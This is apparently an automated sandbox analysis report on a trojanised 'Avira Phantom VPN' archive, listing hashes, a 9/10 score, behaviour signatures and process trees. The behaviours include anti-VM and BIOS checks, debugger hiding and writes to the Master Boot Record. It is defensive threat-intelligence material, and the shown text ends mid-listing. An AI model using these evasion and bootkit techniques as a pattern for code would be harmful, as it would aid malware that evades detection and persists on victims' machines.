21eed4ad34b45a105a0d215f2bbd1dac8face384f0f75f621d10a3c4a3fe284f

Analysis

max time kernel
146s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
06-04-2023 12:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AviraPhantomVPN.7z
Size

28.6MB
MD5

edcaee17a820898e1ef4c3f1410d322d
SHA1

304a5c511e352ef0115d70b0dccb0f4802393b34
SHA256

645ff80fc1abf8919597a792ff5e26fb206f5ad0b5c08bf8a4a365585ca4ece0
SHA512

ce8637d4109997b01a43b4df6d6b0c78902533f56b750fb877044884e14497699239d8bd1ae17aee77bda9e5d4f3cfca4a080dc4b03294c109435fbcf302d2af
SSDEEP

786432:e6jVlMlC4wWESx547yBEQJXkE5Qa1z8eXY+o:bJ4Jn/x5JKQ9dxXY+o

Score

9^/10

bootkit discovery evasion persistence trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VCR-2005-2023-09.02.2023.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VCR-2005-2023-09.02.2023.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VCR-2005-2023-09.02.2023.exe

Executes dropped EXE 6 IoCs

Processes:

AviraPhantomVPN.exeAviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeVCR-2005-2023-09.02.2023.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exe

pid	process
596	AviraPhantomVPN.exe
1596	AviraPhantomVPN.tmp
1048	Avira Phantom VPN 2.41.1.25731.exe
300	VCR-2005-2023-09.02.2023.exe
1572	Avira Phantom VPN 2.41.1.25731.tmp
1332	VCR-2005-2023-09.02.2023.exe

Loads dropped DLL 13 IoCs

Processes:

AviraPhantomVPN.exeAviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

pid	process
596	AviraPhantomVPN.exe
1596	AviraPhantomVPN.tmp
1596	AviraPhantomVPN.tmp
1596	AviraPhantomVPN.tmp
1596	AviraPhantomVPN.tmp
1596	AviraPhantomVPN.tmp
1048	Avira Phantom VPN 2.41.1.25731.exe
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
300	VCR-2005-2023-09.02.2023.exe
1332	VCR-2005-2023-09.02.2023.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VCR-2005-2023-09.02.2023.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	VCR-2005-2023-09.02.2023.exe
File opened for modification	\??\PhysicalDrive0	VCR-2005-2023-09.02.2023.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

pid process

300 VCR-2005-2023-09.02.2023.exe
1332 VCR-2005-2023-09.02.2023.exe

pid	process
300	VCR-2005-2023-09.02.2023.exe
1332	VCR-2005-2023-09.02.2023.exe

Drops file in Program Files directory 6 IoCs

Processes:

AviraPhantomVPN.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-CEU7S.tmp	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-SDPLS.tmp	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.msg	AviraPhantomVPN.tmp
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	AviraPhantomVPN.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 64 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\.7z\ = "7z_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\""	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\shell\open	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\7z_auto_file\	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 88003100000000005456aeb0110050524f4752417e310000700008000400efbeee3a851a5456aeb02a0000003c000000000001000000000000000000460000000000500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Applications\7zFM.exe\shell\open	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\.7z	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	rundll32.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

AviraPhantomVPN.tmppowershell.exepowershell.exe7zFM.exeAvira Phantom VPN 2.41.1.25731.tmp

pid	process
1596	AviraPhantomVPN.tmp
1596	AviraPhantomVPN.tmp
1488	powershell.exe
1420	powershell.exe
1396	7zFM.exe
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

7zFM.exepowershell.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	1396	7zFM.exe
Token: 35	1396	7zFM.exe
Token: SeSecurityPrivilege	1396	7zFM.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

7zFM.exeAviraPhantomVPN.tmp

pid process

1396 7zFM.exe
1396 7zFM.exe
1596 AviraPhantomVPN.tmp
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

rundll32.exeAvira Phantom VPN 2.41.1.25731.tmp

pid process

1124 rundll32.exe
1572 Avira Phantom VPN 2.41.1.25731.tmp
1572 Avira Phantom VPN 2.41.1.25731.tmp
1572 Avira Phantom VPN 2.41.1.25731.tmp

pid	process
1396	7zFM.exe
1396	7zFM.exe
1596	AviraPhantomVPN.tmp

pid	process
1124	rundll32.exe
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp
1572	Avira Phantom VPN 2.41.1.25731.tmp

Suspicious use of WriteProcessMemory 61 IoCs

Processes:

cmd.exerundll32.exe7zFM.exeAviraPhantomVPN.exeAviraPhantomVPN.tmpcmd.exeAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpnet.exeVCR-2005-2023-09.02.2023.exe

description	pid	process	target process
PID 1704 wrote to memory of 1124	1704	cmd.exe	rundll32.exe
PID 1704 wrote to memory of 1124	1704	cmd.exe	rundll32.exe
PID 1704 wrote to memory of 1124	1704	cmd.exe	rundll32.exe
PID 1124 wrote to memory of 1396	1124	rundll32.exe	7zFM.exe
PID 1124 wrote to memory of 1396	1124	rundll32.exe	7zFM.exe
PID 1124 wrote to memory of 1396	1124	rundll32.exe	7zFM.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 1396 wrote to memory of 596	1396	7zFM.exe	AviraPhantomVPN.exe
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 596 wrote to memory of 1596	596	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1596 wrote to memory of 296	1596	AviraPhantomVPN.tmp	cmd.exe
PID 1596 wrote to memory of 296	1596	AviraPhantomVPN.tmp	cmd.exe
PID 1596 wrote to memory of 296	1596	AviraPhantomVPN.tmp	cmd.exe
PID 1596 wrote to memory of 296	1596	AviraPhantomVPN.tmp	cmd.exe
PID 296 wrote to memory of 1488	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1488	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1488	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1488	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1420	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1420	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1420	296	cmd.exe	powershell.exe
PID 296 wrote to memory of 1420	296	cmd.exe	powershell.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 1048	1596	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1596 wrote to memory of 300	1596	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 1596 wrote to memory of 300	1596	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 1596 wrote to memory of 300	1596	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 1596 wrote to memory of 300	1596	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1048 wrote to memory of 1572	1048	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1572 wrote to memory of 844	1572	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 1572 wrote to memory of 844	1572	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 1572 wrote to memory of 844	1572	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 1572 wrote to memory of 844	1572	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 844 wrote to memory of 1664	844	net.exe	net1.exe
PID 844 wrote to memory of 1664	844	net.exe	net1.exe
PID 844 wrote to memory of 1664	844	net.exe	net1.exe
PID 844 wrote to memory of 1664	844	net.exe	net1.exe
PID 300 wrote to memory of 1332	300	VCR-2005-2023-09.02.2023.exe	VCR-2005-2023-09.02.2023.exe
PID 300 wrote to memory of 1332	300	VCR-2005-2023-09.02.2023.exe	VCR-2005-2023-09.02.2023.exe
PID 300 wrote to memory of 1332	300	VCR-2005-2023-09.02.2023.exe	VCR-2005-2023-09.02.2023.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z
1⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1396

C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe
"C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:596

C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp" /SL5="$500EE,28849760,1046016,C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
